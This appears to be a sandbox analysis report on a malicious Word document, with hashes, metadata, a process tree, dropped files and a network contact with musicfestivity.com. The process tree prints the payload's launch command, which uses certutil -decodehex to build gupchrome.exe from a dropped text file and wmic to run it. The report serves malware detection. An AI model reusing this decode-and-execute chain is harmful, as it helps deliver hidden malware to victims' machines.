File name: | 24c11a0db1dcf69755be9ea83f51a613.doc |
Full analysis: | https://app.any.run/tasks/fa7b400b-49d8-40d5-8a3e-52f1fa206235 |
Verdict: | Malicious activity |
Analysis date: | January 11, 2019, 02:33:57 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: Protected document, Author: Paranoid Ninja, Template: Normal.dotm, Last Saved By: ParanoidNinja, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jan 10 04:52:00 2019, Last Saved Time/Date: Thu Jan 10 04:52:00 2019, Number of Pages: 23, Number of Words: 10723, Number of Characters: 61127, Security: 0 |
MD5: | 24C11A0DB1DCF69755BE9EA83F51A613 |
SHA1: | 89D084B94D470EEF1B7BF264EB07A8A46B8B574D |
SHA256: | 2CE82E141E186409F2B26F9915ACC7C35A95D97FB296245612CB0EC7E4EC878D |
SSDEEP: | 12288:GoLRmNWLfuZKMI8rpvsIrk/5i/UJGXrL03WVZXsGH389KFy5mEo8qOF3sIv/Q9:5LRmNeWI8rpHk/5uX4WVZ6KCmGqOFbU |
.doc | | | Microsoft Word document (35.9) |
---|---|---|
.xls | | | Microsoft Excel sheet (33.7) |
.doc | | | Microsoft Word document (old ver.) (21.3) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Hyperlinks: |
|
CodePage: | Windows Latin 1 (Western European) |
HeadingPairs: |
|
TitleOfParts: | Protected document |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 71707 |
Paragraphs: | 143 |
Lines: | 509 |
Company: | - |
Security: | None |
Characters: | 61127 |
Words: | 10723 |
Pages: | 23 |
ModifyDate: | 2019:01:10 04:52:00 |
CreateDate: | 2019:01:10 04:52:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | ParanoidNinja |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Paranoid Ninja |
Subject: | - |
Title: | Protected document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2872 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\24c11a0db1dcf69755be9ea83f51a613.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3912 | cmd /c certutil.exe -decodehex %temp%\gupchrome.txt %temp%\gupchrome.exe & wmic path win32_process call create %temp%\gupchrome.exe | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2488 | certutil.exe -decodehex C:\Users\admin\AppData\Local\Temp\gupchrome.txt C:\Users\admin\AppData\Local\Temp\gupchrome.exe | C:\Windows\system32\certutil.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3524 | wmic path win32_process call create C:\Users\admin\AppData\Local\Temp\gupchrome.exe | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2964 | C:\Users\admin\AppData\Local\Temp\gupchrome.exe | C:\Users\admin\AppData\Local\Temp\gupchrome.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2872 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRECC5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2872 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$c11a0db1dcf69755be9ea83f51a613.doc | pgc | |
MD5:26E10B169F89FE577AE67DC52A1C98E9 | SHA256:9BB6933D1EA76E52FFDCD8DBFDDDBD1F3C59C4043FE4E4EA42F53DE6B71AA037 | |||
2872 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\gupchrome.txt | text | |
MD5:4166BB3E767D23790A52085B506C0A99 | SHA256:00B7D32DA6360D1A39D8EFB45FE1B0B8FD23928DE9C7D36131D8D2FC0A4778EB | |||
2488 | certutil.exe | C:\Users\admin\AppData\Local\Temp\gupchrome.exe | executable | |
MD5:851009E4F6A6B1D614E407B11257AC42 | SHA256:0F760B5951709C6299DA5C467C07B4B77722FDA60DED3C8D050DFA824DD37174 | |||
2872 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:CA520998CE694C844B1FE8C3635EF2C7 | SHA256:A64C55E65AA999414E5773AE0C4B7B6676F20976C3C6BF80941EBF85BA65A013 | |||
2872 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | text | |
MD5:F3B25701FE362EC84616A93A45CE9998 | SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2964 | gupchrome.exe | 23.101.8.251:443 | musicfestivity.com | Microsoft Corporation | HK | unknown |
Domain | IP | Reputation |
---|---|---|
musicfestivity.com |
| unknown |